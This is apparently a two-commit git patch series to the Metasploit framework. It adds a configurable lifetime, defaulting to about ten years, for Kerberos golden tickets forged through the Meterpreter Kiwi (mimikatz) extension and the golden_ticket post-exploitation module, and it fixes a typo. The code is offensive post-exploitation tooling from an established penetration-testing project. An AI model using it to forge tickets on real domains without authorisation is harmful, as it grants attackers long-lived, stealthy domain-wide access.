From 08b81a418f4ff87f72fa4f7622d38f7974a3d3c6 Mon Sep 17 00:00:00 2001
From: Hypnoze57 <Hypnoze57@protonmail.com>
Date: Wed, 9 May 2018 17:44:55 +0200
Subject: [PATCH 1/2] Customization of Golden Ticket Duration

- Post exploitation module updated
- Kiwi extention updated

Using mimikatz /startoffset and /endin params
Duration in hours, default already 10 years
---
 lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb         | 4 +++-
 .../meterpreter/ui/console/command_dispatcher/kiwi.rb    | 9 ++++++---
 modules/post/windows/escalate/golden_ticket.rb           | 7 +++++--
 3 files changed, 14 insertions(+), 6 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
index f3847a9957..0836f1393b 100644
--- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
+++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
@@ -388,6 +388,9 @@ class Kiwi < Extension
       opts[:domain_name],
       " /sid:",
       opts[:domain_sid],
+      " /startoffset:0",
+      " /endin:",
+      opts[:end_in] * 60,
       " /krbtgt:",
       opts[:krbtgt_hash],
       "\""
@@ -510,4 +513,3 @@ class Kiwi < Extension
 end
 
 end; end; end; end; end
-
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
index b3353218fc..302c3820f3 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
@@ -237,7 +237,8 @@ class Console::CommandDispatcher::Kiwi
     '-d' => [ true,  'FQDN of the target domain (required)' ],
     '-k' => [ true,  'krbtgt domain user NTLM hash' ],
     '-t' => [ true,  'Local path of the file to store the ticket in (required)' ],
-    '-s' => [ true,  'SID of the domain' ]
+    '-s' => [ true,  'SID of the domain' ],
+    '-e' => [ true,  'End in ... Duration in hours (ex: -e 10 for 10 hours), default 10 YEARS']
   )
 
   #
@@ -267,7 +268,8 @@ class Console::CommandDispatcher::Kiwi
       domain_sid: nil,
       krbtgt_hash: nil,
       user_id: nil,
-      group_ids: nil
+      group_ids: nil,
+      end_in: 87608
     }
 
     @@golden_ticket_create_opts.parse(args) { |opt, idx, val|
@@ -286,6 +288,8 @@ class Console::CommandDispatcher::Kiwi
         opts[:group_ids] = val
       when '-s'
         opts[:domain_sid] = val
+      when '-e'
+        opts[:end_in] = val.to_i
       end
     }
 
@@ -647,4 +651,3 @@ end
 end
 end
 end
-
diff --git a/modules/post/windows/escalate/golden_ticket.rb b/modules/post/windows/escalate/golden_ticket.rb
index 2f211c5541..51d29fc59e 100644
--- a/modules/post/windows/escalate/golden_ticket.rb
+++ b/modules/post/windows/escalate/golden_ticket.rb
@@ -43,7 +43,8 @@ class MetasploitModule < Msf::Post
         OptString.new('KRBTGT_HASH', [false, 'KRBTGT NTLM Hash']),
         OptString.new('Domain SID', [false, 'Domain SID']),
         OptInt.new('ID', [false, 'Target User ID']),
-        OptString.new('GROUPS', [false, 'ID of Groups (Comma Seperated)'])
+        OptString.new('GROUPS', [false, 'ID of Groups (Comma Seperated)']),
+        OptInt.new('END_IN', [true, 'End in ... Duration in hours, default 10 YEARS (~87608 hours)', 87608])
       ])
   end
 
@@ -55,6 +56,7 @@ class MetasploitModule < Msf::Post
     krbtgt_hash = datastore['KRBTGT_HASH']
     domain_sid = datastore['SID']
     id = datastore['ID'] || 0
+    end_in = datastore['END_IN'] || 87608
 
     unless domain
       print_status('Searching for the domain...')
@@ -110,7 +112,8 @@ class MetasploitModule < Msf::Post
       domain_sid:  domain_sid,
       krbtgt_hash: krbtgt_hash,
       id:          id,
-      group_ids:   datastore['GROUPS']
+      group_ids:   datastore['GROUPS'],
+      end_in:     end_in
     })
 
     if ticket

From d7770a98b24f649d48406b2c978a455d2452730a Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Wed, 27 Jun 2018 15:36:41 -0500
Subject: [PATCH 2/2] s/Seperated/Separated/

---
 modules/post/windows/escalate/golden_ticket.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/escalate/golden_ticket.rb b/modules/post/windows/escalate/golden_ticket.rb
index 51d29fc59e..5bc51ec740 100644
--- a/modules/post/windows/escalate/golden_ticket.rb
+++ b/modules/post/windows/escalate/golden_ticket.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Post
         OptString.new('KRBTGT_HASH', [false, 'KRBTGT NTLM Hash']),
         OptString.new('Domain SID', [false, 'Domain SID']),
         OptInt.new('ID', [false, 'Target User ID']),
-        OptString.new('GROUPS', [false, 'ID of Groups (Comma Seperated)']),
+        OptString.new('GROUPS', [false, 'ID of Groups (Comma Separated)']),
         OptInt.new('END_IN', [true, 'End in ... Duration in hours, default 10 YEARS (~87608 hours)', 87608])
       ])
   end